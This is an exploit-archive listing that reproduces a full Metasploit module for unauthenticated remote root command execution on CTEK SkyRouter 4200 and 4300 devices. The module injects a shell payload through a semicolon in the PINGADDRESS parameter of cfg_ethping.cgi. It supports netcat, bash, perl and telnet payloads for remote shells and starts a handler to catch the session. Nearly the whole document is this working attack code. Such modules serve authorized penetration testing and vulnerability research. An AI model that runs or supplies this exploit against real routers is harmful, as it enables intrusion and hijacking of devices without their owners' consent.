CTEK SkyRouter 4200 and 4300 Command Execution



EKU-ID: 1354 CVE: OSVDB-ID:
Author: savant42 Published: 2011-12-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'CTEK SkyRouter 4200 and 4300 Command Execution',
   'Description'    => %q{
     This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
   },
   'Author'         => [ 'savant42' ],  #with module help from kos
   'License'        => MSF_LICENSE,
   'References'     => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Space'       => 1024,
     'Compat'      =>
      {
       'PayloadType' => 'cmd',
       'RequiredCmd' => 'generic perl telnet netcat-e bash',
      }
    },
   'Platform'       => 'unix',
   'Arch'           => ARCH_CMD,
   'Targets'        => [[ 'Automatic', { }]],
   'DisclosureDate' => 'Sep 8 2011', # CGI historical date :)
   'DefaultTarget' => 0))

 end

 def exploit
  post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
  uri    = '/apps/a3/cfg_ethping.cgi'
  print_status("Sending HTTP request for #{uri}")
  res = send_request_cgi( {
   'global' => true,
   'uri'    => uri,
   'method' => "POST",
   'data' => post_data
  }, 30)

  if res
   print_status("The server responded with HTTP CODE #{res.code}")
  else
   print_status("The server did not respond to our request")
  end

  handler
 end

end